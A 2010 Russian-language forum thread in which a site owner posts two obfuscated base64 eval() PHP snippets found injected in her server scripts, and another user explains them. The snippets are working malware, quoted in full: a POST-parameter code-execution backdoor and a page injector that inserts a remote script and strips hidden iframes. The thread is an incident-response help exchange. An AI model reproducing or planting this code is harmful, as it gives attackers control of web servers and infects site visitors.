| |
|
|
| | Нашла в скриптах на сервере вот такое . Кто скажет что это означает. Наверно это закодированная ссылка на какой-то сайт. Это посторонний код который я нашла в своих скриптах.
<?php eval(base64_decode('aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWw oYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXS kpO2Vsc2UgZGllKCc0MDQgTm90IEZvdW5kJ yk7'));?> | |
| |
|
|
| |
|
|
| |
для: tavila2009
(19.02.2010 в 04:10)
| | | Это не ссылка, это:
if(isset($_POST['e']))eval(base64_decode($_POST['e']));else die('404 Not Found');
Пороверяйте все, как вам забросили червей. | |
| |
|
|
| |
|
|
| |
для: sim5
(19.02.2010 в 04:23)
| | | А вот это как расшифровывается?
<?php eval(base64_decode('aWYoIWZ1bmN0aW9uX2V4aXN0cygnc2M5d2E nKSl7ZnVuY3Rpb24gc2M5d2EoJHMpe2lmKH ByZWdfbWF0Y2hfYWxsKCcjPHNjcmlwdCguK j8pPC9zY3JpcHQ+I2lzJywkcywkYSkpZm9yZWFjaCgkYVswXWF zJHYpaWYoY291bnQoZXhwbG9kZSgiXG4iLC R2KSk+NSl7JGU9cHJlZ19tYXRjaCgnI1tcJyJdW15 cc1wnIlwuLDtcPyFcW1xdOi88PlwoXCldez MwLH0jJywkdil8fHByZWdfbWF0Y2goJyNbX ChcW10oXHMqXGQrLCl7MjAsfSMnLCR2KTtp ZigocHJlZ19tYXRjaCgnI1xiZXZhbFxiIyc sJHYpJiYoJGV8fHN0cnBvcygkdiwnZnJvbU NoYXJDb2RlJykpKXx8KCRlJiZzdHJwb3MoJ HYsJ2RvY3VtZW50LndyaXRlJykpKSRzPXN0 cl9yZXBsYWNlKCR2LCcnLCRzKTt9aWYocHJ lZ19tYXRjaF9hbGwoJyM8aWZyYW1lIChbXj 5dKj8pc3JjPVtcJyJdPyhodHRwOik/Ly8oW14+XSo/KT4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzB dYXMkdilpZihwcmVnX21hdGNoKCcjW1wuIF 13aWR0aFxzKj1ccypbXCciXT8wKlswLTldW 1wnIj4gXXxkaXNwbGF5XHMqOlxzKm5vbmUj aScsJHYpJiYhc3Ryc3RyKCR2LCc/Jy4nPicpKSRzPXByZWdfcmVwbGFjZSgnIyc ucHJlZ19xdW90ZSgkdiwnIycpLicuKj88L2 lmcmFtZT4jaXMnLCcnLCRzKTskcz1zdHJfc mVwbGFjZSgkYT1iYXNlNjRfZGVjb2RlKCdQ SE5qY21sd2RDQnpjbU05YUhSMGNEb3ZMMjF rY2k1dGFXOXpaWEoyWlhJdVkyOXRMMmx0WV dkbGN5OW5hV1pwYldjdWNHaHdJRDQ4TDNOa mNtbHdkRDQ9JyksJycsJHMpO2lmKHN0cmlz dHIoJHMsJzxib2R5JykpJHM9cHJlZ19yZXB sYWNlKCcjKFxzKjxib2R5KSNtaScsJGEuJ1 wxJywkcywxKTtlbHNlaWYoc3RycG9zKCRzL Cc8YScpKSRzPSRhLiRzO3JldHVybiRzO31m dW5jdGlvbiBzYzl3YTIoJGEsJGIsJGMsJGQ pe2dsb2JhbCRzYzl3YTE7JHM9YXJyYXkoKT tpZihmdW5jdGlvbl9leGlzdHMoJHNjOXdhM SkpY2FsbF91c2VyX2Z1bmMoJHNjOXdhMSwk YSwkYiwkYywkZCk7Zm9yZWFjaChAb2JfZ2V 0X3N0YXR1cygxKWFzJHYpaWYoKCRhPSR2Wy duYW1lJ10pPT0nc2M5d2EnKXJldHVybjtlb HNlaWYoJGE9PSdvYl9nemhhbmRsZXInKWJy ZWFrO2Vsc2Ukc1tdPWFycmF5KCRhPT0nZGV mYXVsdCBvdXRwdXQgaGFuZGxlcic/ZmFsc2U6JGEpO2ZvcigkaT1jb3VudCgkcyk tMTskaT49MDskaS0tKXskc1skaV1bMV09b2 JfZ2V0X2NvbnRlbnRzKCk7b2JfZW5kX2NsZ WFuKCk7fW9iX3N0YXJ0KCdzYzl3YScpO2Zv cigkaT0wOyRpPGNvdW50KCRzKTskaSsrKXt vYl9zdGFydCgkc1skaV1bMF0pO2VjaG8gJH NbJGldWzFdO319fSRzYzl3YWw9KCgkYT1Ac 2V0X2Vycm9yX2hhbmRsZXIoJ3NjOXdhMicp KSE9J3NjOXdhMicpPyRhOjA7ZXZhbChiYXN lNjRfZGVjb2RlKCRfUE9TVFsnZSddKSk7')); ?> | |
| |
|
|
| |
|
|
| |
для: tavila2009
(19.02.2010 в 05:50)
| | | А вот так посмотрите:
echo base64_decode('aWYoIWZ1bmN0aW9uX2V4aXN0cygnc2M5d2E......
и увидите внедрение на страницу IFRAME, а если все досконально проверить, то и с какой целью.... | |
| |
|
|
| |
|
|
| |
для: sim5
(19.02.2010 в 06:10)
| | | спасибо. | |
| |
|
|
